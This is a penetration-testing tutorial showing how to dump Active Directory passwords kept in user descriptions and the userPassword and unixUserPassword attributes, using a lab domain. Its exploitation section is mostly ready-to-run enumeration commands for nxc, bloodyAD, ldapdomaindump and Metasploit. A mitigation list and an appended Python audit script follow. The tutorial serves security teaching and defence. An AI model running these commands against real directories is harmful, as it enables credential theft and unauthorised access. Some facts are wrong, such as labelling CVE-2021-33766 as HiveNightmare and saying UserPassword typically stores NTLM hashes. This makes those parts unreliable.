Credential Dumping

Credential Dumping: AD User Comment

In this article, we explore how attackers exploit AD user comments and attributes for password enumeration. This process helps attackers escalate their access within an organization by leveraging AD user comment password enumeration.

Active Directory (AD) and related services contain several critical vulnerabilities. These can expose password-related information stored in attributes like UserPassword, UnixUserPassword, unicodePwd, and msSFU30Password. Attackers can exploit these flaws to access password hashes or even cleartext passwords, which significantly increases the risk of unauthorized access to systems and data. Key attack paths include privilege escalation, improper access control configurations, and vulnerabilities in network protocols like SMB or RDP that enable attackers to intercept or access sensitive fields. Notable CVEs that enable such exploits include CVE-2020-1472 (Zerologon), CVE-2017-0144 (EternalBlue), CVE-2021-33766 (HiveNightmare), and CVE-2019-0708 (BlueKeep), all of which, if exploited, can lead to unauthorized access to critical password fields in AD.

Table of Contents

Understanding of Active Directory (AD) password attributes

Prerequisites

Lab Setup

Exploitation

  • nxc
  • bloodyAD
  • ldapdomaindump
  • MetaSploit
  • Get-WmiObject

Mitigation

Understanding of Active Directory (AD) password attributes:

UserPassword: In Active Directory, the UserPassword field typically refers to the password hash stored for users (NTLM or sometimes Kerberos hashes). These hashes are used to authenticate users without directly storing plaintext passwords. If attackers access these hashes, they can perform offline attacks. These include brute force or dictionary attacks to recover original passwords.

UnixUserPassword: This field is used when integrating AD with Unix/Linux systems. Services like SSSD or nsswitch.conf support such authentication. It stores the password hash for Unix-based systems, which is usually a different format (e.g., DES, SHA-512) than Windows hashes.

unicodePwd: The unicodePwd attribute in Active Directory holds the password for a user in Unicode format (UTF-16). This field is used by AD when passwords are being set or updated. In a typical AD deployment, this field would not be readable directly through normal LDAP queries due to security restrictions.

msSFU30Password: The msSFU30Password attribute is associated with the Microsoft Services for Unix (SFU) integration. This field stores passwords used in Unix environments but integrated into Active Directory, similar to the unixUserPassword attribute. If a system uses SFU, this field will store the password hash in a Unix-compatible format.

Prerequisites

  • Windows Server 2019 as Active Directory Domain Controller
  • Tools: nxc, bloodyAD, ldapdomaindump, MetaSploit, Get-WmiObject utility
  • Kali Linux
  • Windows 10/11 as Client/Attacker Machine

Lab Setup

In this lab setup, we create an AD user, add a user description that contains the user’s password, and store passwords in the “userPassword” and “unixUserPassword” attributes.

Create the AD Environment

To simulate an Active Directory environment, set up a Windows Server 2019 as a Domain Controller (DC). You will also need a client/attacker machine (Windows or Linux) to run enumeration and exploitation tools.

Domain Controller

Install Windows Server (2016 or 2019 recommended).

  • Promote it to a Domain Controller by adding the “Active Directory Domain Services” role.
  • Set up the domain (e.g., “ignite.local”, the domain used in the commands in this article).
  • Next, create a domain user with username “raj” and password “Password@1”.

Create an AD user and provide user description

Once the AD environment is set up, open PowerShell in Administrative mode on the Windows Server. Then, run the commands below. They create the user “divya” (with password “Password@123”) and set its “description” attribute to a string containing the password.

Import-Module ActiveDirectory
New-ADUser -Name "divya" -SamAccountName "divya" -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Enabled $true
Set-ADUser -Identity "divya" -Description "this is a default password =Password@123"

Using the “Get-ADUser” cmdlet with a command like the one below, we can confirm that a user with “divya” as username has been created along with the description provided.

Get-ADUser -Identity "divya" -Properties Description | Select-Object Name, Description

Then navigate to the “divya” user’s properties window by following the steps below.

Steps
  • Open “Active Directory Users and Computers (ADUC)” on the Domain Controller.
  • Enable the “Advanced Features” view by clicking on “View > Advanced Features”.
  • Locate user “divya” in the “Users” container.
  • Right-click on the “divya” user and go to “Properties”.

This action opens the “General” tab of the “divya” user’s Properties window, where the “Description” added above can be viewed and confirmed.

Update userPassword attribute:

Navigate to the “Attribute Editor” tab within the “divya” user’s properties window, select the “userPassword” attribute and click on the “Edit” button. This action opens the “Multi-valued Octet String Editor” pop-up window. Click on the “Add” button in the new window.

Then, provide the “divya” user’s password Password@123 in its hexadecimal form within the “Value” textarea and click on the “OK” button in the “Octet String Attribute Editor” pop-up window.

Update unixUserPassword attribute:

Similar to the steps in the “Update userPassword attribute” section above, one can select the “unixUserPassword” attribute and update its value to “admin@123”.

Select the “unixUserPassword” attribute and click on the “Edit” button. This action opens the “Multi-valued Octet String Editor” pop-up window. Click on the “Add” button in the new window.

Provide the “divya” user’s Unix password admin@123 in its hexadecimal form within the “Value” textarea and click on the “OK” button in the “Octet String Attribute Editor” pop-up window.

Alternatively, one can run the command below from the PowerShell window opened in the “Create an AD user and provide user description” section to set the “divya” user’s Unix password to “admin@123”.

Set-ADUser -Identity "divya" -Replace @{
    uidNumber=1001;
    gidNumber=1001;
    unixHomeDirectory="/home/linux";
    loginShell="/bin/bash";
    unixUserPassword="admin@123"
}

Exploitation

nxc

Run the command below from a Kali Linux root terminal to retrieve user descriptions stored in Active Directory using the “user-desc” module of the “nxc” tool.

nxc ldap 192.168.1.48 -u raj -p Password@1 -M user-desc

Next, open the “nxc” tool log with the command below to revisit the enumerated information at a later time.

cat /root/.nxc/logs/UserDesc-192.168.1.48-20250120_052352.log

In addition, run the following commands to enumerate sensitive information such as passwords.

  • Enumerate AD users’ descriptions, which at times contain passwords, using the module “get-desc-users”.

nxc ldap 192.168.1.48 -u raj -p Password@1 -M get-desc-users

  • Enumerate the userPassword attribute of all users over LDAP using the module “get-userPassword”.

nxc ldap 192.168.1.48 -u raj -p Password@1 -M get-userPassword

  • Enumerate the unixUserPassword attribute of all users over LDAP using the module “get-unixUserPassword”.

nxc ldap ignite.local -u raj -p Password@1 -M get-unixUserPassword

bloodyAD

Run the command below to enumerate all users’ sensitive information stored in the “userPassword”, “unixUserPassword”, “unicodePwd” and “description” attributes.

bloodyAD -u raj -p 'Password@1' -d ignite.local --host 192.168.1.48 get search --filter '(|(userPassword=*)(unixUserPassword=*)(unicodePwd=*)(description=*))' --attr userPassword,unixUserPassword,unicodePwd,description

The output contains sensitive information such as passwords, as well as descriptions stating which attacks a user is vulnerable to.

ldapdomaindump

Run the commands below to dump complete information about the AD under test, then navigate to the “AD_DUMP” directory and list all the files generated by the “ldapdomaindump” tool.

ldapdomaindump -u 'ignite.local\raj' -p Password@1 192.168.1.48 -o AD_DUMP
cd AD_DUMP
ls -al

Now, open the “domain_users.html” file in a browser. Observe that the attacker could enumerate the AD users’ “description” attribute, which gives away a user’s password or the attack technique to which the user is vulnerable.

MetaSploit

Launch the MetaSploit Framework Console (msfconsole) from a Kali Linux root terminal.

Use the “ldap_query” auxiliary module, set all required options and run the module to enumerate all AD users’ information.

use auxiliary/gather/ldap_query
set action ENUM_ACCOUNTS
set rhosts 192.168.1.48
set username raj
set password Password@1
set domain ignite.local
run

The output screenshot below lists AD users along with the information stored in the AD “description” attribute.

Note: Alternatively, we may use the “enum_ad_user_comments” post module to enumerate users’ information along with the contents of the AD “description” attribute. Below is the list of commands to execute in sequence from a Kali Linux root terminal, followed by the output screenshot.

use post/windows/gather/enum_ad_user_comments
set session 1
run

Get-WmiObject

Open PowerShell in Administrative mode on a Windows client/attacker machine. Then, run the command below to enumerate the “Name”, “SID”, “Domain” and “Description” of the users listed in the command using the “Get-WmiObject” cmdlet.

Get-WmiObject -Class Win32_UserAccount | Where-Object { $_.Name -in @("raj", "divya") } | Select-Object Name, SID, Domain, Description

Mitigation

Vulnerabilities like CVE-2020-1472 (Zerologon), CVE-2017-0144 (EternalBlue), CVE-2021-33766 (HiveNightmare), and CVE-2019-0708 (BlueKeep) highlight potential risks. However, the UserPassword, UnixUserPassword, unicodePwd, and msSFU30Password attributes do not always present a direct threat; they are exposed only under specific conditions.

Even so, attackers can use various attack vectors to gain the access needed to retrieve these password-related fields from the Active Directory configuration.

Below are the best practices to follow diligently to remediate and remove the possibility of enumerating AD users’ passwords:

Use Strong Encryption: Ensure that all communications between clients and domain controllers remain encrypted (LDAPS, SMB encryption, etc.) to prevent attackers from intercepting password hashes. Also, disable legacy authentication protocols such as NTLM where possible.

Limit Access to Password Attributes: Use stringent Access Control Lists (ACLs) to restrict access to sensitive attributes like UserPassword, UnixUserPassword, unicodePwd, and msSFU30Password to a trusted and limited number of administrators.

Regularly Audit AD Permissions: Regularly review and audit the permissions on AD objects to ensure that only authorized users and groups can access sensitive fields.

Apply Security Patches: Ensure all AD and associated systems (like Unix integrations) are regularly patched to prevent exploitation of known vulnerabilities.

Monitor for Privilege Escalation: Use monitoring & alerting tools and practices to detect suspicious activities such as privilege escalation, lateral movement and/or attempts to dump credentials.
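As an added defensive example (not code from the original article), the following Python audit applies the "Regularly Audit AD Permissions" advice to the attributes discussed above: it decodes the octet-string values that userPassword and unixUserPassword return over LDAP (the hex pasted into the Attribute Editor comes back as raw bytes) and flags descriptions that look like they carry a credential. The attribute names are real; the entries it runs on are constructed samples shaped like an LDAP search result rather than data pulled from a live directory.

```python
import re

# Attributes the article identifies as password-bearing. userPassword and
# unixUserPassword are octet strings, so an LDAP search returns raw bytes.
PASSWORD_ATTRS = ("userPassword", "unixUserPassword", "msSFU30Password", "unicodePwd")
# Words in a description that suggest someone wrote a credential into the comment.
SECRET_HINT = re.compile(r"\b(pass(word|wd)?|pwd|cred(ential)?s?)\b", re.IGNORECASE)


def decode_octet(value):
    """Render an octet-string value as text; fall back to hex if it is not UTF-8."""
    if isinstance(value, bytes):
        try:
            return value.decode("utf-8")
        except UnicodeDecodeError:
            return value.hex()
    return str(value)


def audit_entry(entry):
    """Return (account, attribute, decoded value) for every exposure in one entry."""
    findings = []
    name = entry.get("sAMAccountName", "?")
    for attr in PASSWORD_ATTRS:
        values = entry.get(attr) or []
        if isinstance(values, (bytes, str)):
            values = [values]          # single-valued results may come back unwrapped
        for v in values:
            findings.append((name, attr, decode_octet(v)))
    desc = entry.get("description") or ""
    if SECRET_HINT.search(desc):
        findings.append((name, "description", desc))
    return findings


def audit_directory(entries):
    """Flatten findings over a whole user listing."""
    return [f for e in entries for f in audit_entry(e)]


# Constructed sample entries modelled on the lab users; not real directory data.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "divya",
     "description": "this is a default password =Password@123",
     "userPassword": [bytes.fromhex("50617373776f726440313233")],  # hex as pasted in the editor
     "unixUserPassword": [b"admin@123"]},
    {"sAMAccountName": "raj", "description": "Helpdesk analyst"},
]

if __name__ == "__main__":
    for account, attr, value in audit_directory(SAMPLE_ENTRIES):
        # Mask the value in the report; the point is which accounts and attributes leak.
        print(f"{account}: {attr} exposes {value[:2]}{'*' * (len(value) - 2)}")
```

To run it against a real domain, feed `audit_directory` the entries returned by any LDAP client (for example the JSON that ldapdomaindump writes) and treat every finding as an attribute to clear and an ACL to review.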

Author: Srikrishna is a Cybersecurity leader driving security excellence and mentoring teams to enhance security across products, networks, and organizations.